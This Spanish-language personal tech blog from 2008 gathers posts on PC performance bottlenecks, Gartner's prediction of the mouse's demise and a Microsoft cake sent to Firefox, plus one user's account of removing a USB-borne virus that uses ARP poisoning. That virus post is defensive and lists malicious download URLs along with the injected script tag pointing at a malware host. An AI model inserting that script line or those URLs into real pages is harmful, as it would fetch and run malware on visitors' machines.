miércoles, 3 de septiembre de 2008 en 6:44 Publicado por K1m
viernes, 25 de julio de 2008 en 13:04 Publicado por K1m
viernes, 18 de julio de 2008 en 12:48 Publicado por K1m
Estrechos pasos
El problema se ubica en la parte más lenta de la cadena. Puede ser el acceso a la información en el disco duro o la conexión a Internet.
Otro problema frecuente es la ausencia de una tarjeta de video o el uso de una que comparta memoria con la RAM.
¿La consecuencia de estas carencias? La mayor parte del tiempo la PC estará esperando la información de alguna de esas partes.
Hasta la llegada del sistema operativo Windows Vista, el cuello de botella más común era el provocado por la escasez de memoria RAM. Pero el sucesor del Windows XP exige mucho recursos de los componentes de video y procesamiento del equipo, por lo que los puntos mas debiles de la cadena donde se lentifica el proceso pasan por estas partes.
Vista ya viene preinstalado en la gran mayoría de las computadoras que se venden actualmente. Por lo tanto, se deben prestar atención a los siguientes componentes antes de comprar una PC o notebook:
Cambios en el usuario
“Se puede mejorar la perfomance de una PC con muy poco”, se advierte que “las expectativas del cliente actualmente han cambiado muchísimo. No sólo quiere usar Word, Excel, mail, mensajería. Ahora también escucha música, ven videos, peliculas en la PC, que se convirtió en su repositorio de archivos musicales y películas”. Y ahora también quiere conectarse a los juegos en línea. “El usuario no se está llevando una buena experiencia en los equipos que compra”.
Otras demandas del usuario son la mayor eficiencia energética del equipo que compra y que no genere ruidos molestos. “Este predominio de lo visual, en la experiencia del usuario, fue ratificado a por Nvidia, empresa que lanzó una campaña denominada “Optimice su PC”.
La empresa sostuvo que el paradigma cambió en la computadora: de equipo enfocado a la productividad a una visual centrada en la creatividad. Cobra aquí importancia la incorporación de una tarjeta de video fuera de la motherboard para mejorar el rendimiento general del equipo.En conclucion, para elegir un buen equipo acorde con sus necesidades debera poner en tapete todo lo que requerrira que su equipo haga, una vez identificadas sus necesidades, solicite apoyo a alguien con conociemientos computacionales para ayudarle a elegir su equipo.
jueves, 17 de julio de 2008 en 13:09 Publicado por K1m
El invento del ratón no dio ninguna regalía a su creador, Douglas Engelbart. |
Está a punto de cumplir 40 años y es una de las herramientas más útiles y menos sofisticadas de la era tecnológica, pero ahora sus días podrían estar contados.
Se trata del humilde ratón que, tal como predice un grupo de expertos, podría desaparecer de nuestros escritorios en los próximos cinco años.
Y quien ocupará su lugar -afirma la empresa consultora de informática Gartner- serán los llamados mecanismos de computación gesticular.
Estos sistemas incluyen los monitores sensibles al tacto y la tecnología de reconocimiento facial.
Tal como dijo a la BBC Steve Prentice, analista de Gartner "el ratón funciona bien para las computadoras de escritorio, pero para los sistemas de entretenimiento del hogar o para las computadoras portátiles, sus días están terminados".
El futuro
Esta predicción, afirma Prentice, se basa en el trabajo actual de la industria de aparatos electrónicos que está creando productos con nuevas interfases interactivas inspiradas en el mundo de los juegos de video.
Por ejemplo, Panasonic está produciendo sistemas de entretenimiento en los que en lugar de utilizar el control remoto convencional el usuario levanta la mano o señala y el sistema reconoce lo que ésta ha hecho.
"También es capaz de reconocer tu cara y después de identificarte te presenta en la pantalla de TV un menú", señala el analista.
Muchos elogian la innovadora interfaz de juegos como Guitar Hero. |
También se están desarrollando sistemas "emotivos" en los que con un auricular el usuario puede controlar la computadora solamente con el pensamiento.
Se trata, dice Steven Prentice, de utilizar el poder de la computación para hacer cosas más inteligentes.
El ratón fue inventado por Douglas Engelbart cuando trabajaba en el Instituto Stanford de Investigación.
El invento, sin embargo, nunca le dio regalías porque su patente expiró en 1987, antes de que la revolución de las PC convirtiera al ratón en una herramienta indispensable.
Pesimista
Logitech, el mayor fabricante de ratones y teclados, ha vendido más de 500 millones de ratones en los pasados 20 años.
Por eso la empresa cree que la predicción del fin del ratón es demasiado pesimista.
Tal como señala Rory Dooley, gerente general de la unidad de aparatos de control de Logitech, el ratón seguirá siendo importante, sobre todo teniendo en cuenta que el mundo en desarrollo todavía no se ha integrado totalmente a la revolución de internet.
"La forma de llevar tecnología, educación e información a esas partes del mundo será teniendo acceso a buscadores de internet y hacer con una computadora lo que hasta ahora hemos hecho usando un ratón", dice Dooley.
"Actualmente mil millones de personas tienen acceso a internet -agrega- pero en el mundo hay más de seis mil millones de habitantes".
La pregunta es si estamos realmente preparados para empezar a mover las manos en el aire o a hacer gestos faciales frente a una pantalla.
Según Steve Prentice, millones de personas ya lo están haciendo gracias a consolas de juego como la Wii de Nintendo o los teléfonos inteligentes como el iPhone.
"Con la Wii puedes señalar y sacudir la mano y el aparato responde vibrando, así que se establece una relación interactiva", dice el experto.
Y juegos de video interactivos, como "Guitar Hero", en el que el usuario toca una guitarra y con ésta controla las notas musicales en el video, ha sido muy elogiado por su "innovadora interfaz".
No todo, sin embargo, está perdido para los que lamentan la pérdida de las herramientas antiguas.
El teclado, tal como predice Steve Prentice, todavía seguirá acompañándonos en el futuro.
Ésta, afirma el experto, continuará siendo el aparato básico para introducción de texto y por el momento no se ha visto nada que pueda reemplazarlo.
sábado, 12 de julio de 2008 en 10:29 Publicado por K1m
Hace un tiempo que vengo lidiando con este virus que no me deja navegar tranquilo, no entran las bandejas de entrada del hotmail, las paginas cargan desconfiguradas y con errores, el antivirus me alerta a cada momento que intenta descargar archivos desde direcciones tipo:
http://mx.content-type.cn:443/day.js
http://ad.5yy.info/014.thm
http://js.tongji.cn.yahoo.com/621252/ystat.js
http://dt.tongji.cn.yahoo.com
http://log2.soft.cn.yahoo.com/
http://ad.5iyy.info/day.js
http://ad.5iyy.info/f/ilink.html
mx.yahoo........
etc.
El trafico se hace demaciado lento, etc
Voy a tratar de identificar como trabaja este virus y como por el momento parece averlo erradicado de mis PCs:
Primeramente como llega a nuestras PCs:
Suele llegar en memorias USB, mp3 players, mp4 players, hasta camaras fotograficas e encontrado infectadas con archivos autorun.inf y archivos .bat, .com, .dat, con nombres a azar y el famoso mae10c.exe, o ntde1ect.com y una variedad de nombres creados aleatoriamente.
Estos archivos estan con atributos de oculto, solo lectura y de sistema por lo que no son visibles a simple vista.
Se reproduce al abrir con doble click dicha memoria, o un disco infectado, el autorun ejecuta los archivos, creando claves en los registros, impidiendo cambiar la configuracion para ver archivos ocultos y de sistema, infecta los archivos ejecutables, se copia en memorias, diskets, discos duros creando una copia de si mismo(autoruns y archivos), tambien se copia atravez de recursos compartidos en la red.
Para salvacion de algunos el virus no atraviesa el deep Freeze, con una reiniciada del equipo se acabaria el problema pero quedan infectadas las unidades descongeladas, los USB los cuales al abrirlas se ejecuta y se repite el proceso.
Ahora veamos que hace:
Despues de lo ya dicho lineas arriba, el virus se apodera de la maquina y lanza un ataque de envenenamiento ARP, redireccionando todo el trafico de la red hacia la maquina e inyectado un codigo java script en cada peticion de conección a internet, para despues recien enviarla hacia internet, este codigo java(script language="javascript" SRC=http://mx.content-type.cn:443/day.js) lo que hace es descargar y ejecutar actualizaciones y modificaciones del virus en los equipos, por lo que todas las pcs de una red parecen infectadas.
Que hacer:
En primer lugar tenemos que indetificar la PC contagiosa,
En cuanto empieze las alertas del antivirus iremos a inicio ---> ejecutar o tambien presionando la tecla windows(si la de la ventanita) + R, para mostrar la ventana ejecutar,---> escribes CMD y enter, en la ventana DOS que nos saldra digitamos el comando arp -a con esto cargamos la tabla ARP:
Dirección IP Dirección Física Tipo
Algo mas o menos asi saldria, generalmente la direccion 192.168.1.1 es la puerta de enlace predeterminado que corresponde al router dependiendo de la configuracion que tu proveedor te haya hecho.
Repite el comando arp -a varias veces para ver cuales direcciones permanecen constantes, la direccion que siempre permanesca en la lista es la sospechosa, asi toma nota de la IP y manos a la obra, si les asignaste una direccion ip fija a cada maquina sera facil ubicarla pero en caso de ser dinamica tendras que ir de una en una y ejecturar el comando ipconfig(inicio ---> ejecutar ---> cmd ----> ipconfig)(*) para averiguar a que pc corresponde la direccion sospechosa.
Una vez identificada la maquina, desconectala de la red(**) y ahora depende de ti, le haces una limpieza total o formateas(***) XD.
Limpiando la infectada:
Si tiene deep freeze descongelala, desconectala de la red, instalale antivirus actualizado, tambien un anti malware, para hacerlo debes tener todo lo necesario en un USB limpio o disco, no conectes para nada la red ya que la red esta infestada del virus y puede que exista mas de una pc contagiosa. Ejecutalo uno por uno en modo a prueba de fallos, examina tus discos, particiones a fondo, memoria, pasa el ccleaner.
Ahora instala el Service Pack 3 (SP3)(opcional) para evitar que el explorer(no el iexplorer) se infecte en caso de futuros ataques, el SP3 corrige vulneravilidades del explorer que se aprovecha el virus, pero no significa que seras invulnerable con el, esto afecta hasta linux ya que el virus hafecta el trafico de la red, pero almenos inpedira que tu maquina se convierta en la atacante si es que existe otra infectada.
Si eres paranoico o estas como yo desesperado con este vicho jeje, despues pasa otra ves tu antivirus y anti malware, ojo sin conectar a la red hasta estar seguro de que no hay mas infectadas.
Congela tu maquina y apagala, serciorate que no hay mas infectadas en la red, en caso de encontrar otras infectadas repite el procedimiento para limpiarlas.
Asi me pude liberar de este vicho, almenos por ahora ya no me da problemas.
Notas:
(*) El comando ipconfig nos muestra la direccion ip de cada maquina sea dinamica o fija, la mascara de sub red y la puerta de enlace.
(**) Al desconectar de la red sucede que las otras maquinas no podran acceder a internet ya q todo el trafico se estaba redireccionando a la infectada, esto se normalizara en unos momentos pero si deceas apagas y enciendes tu router.
(***)En caso de formatear ya sabes solo conectas la red cuando estes seguro que la red este limpia.
Espero les ayude a liberarse de este vicho.
Etiquetas: virus 0 comentarios
miércoles, 18 de junio de 2008 en 16:55 Publicado por K1m
Que no se diga que los de Microsoft no tienen sentido del humor. Al igual que hicieron cuando Firefox bajó en su volumen de descargas (para entonces les enviaron unas tortas), ahora Microsoft le ha enviado al equipo de Firefox una tarta para felicitar su éxito.
El pastel fue entregado en persona y aceptado con simpatía por los chicos y chicas de Firefox. Y es que no es necesario ser enemigos en un mercado en el que todos pueden ganar algo (siempre y cuando el gesto no vaya con segundas, claro).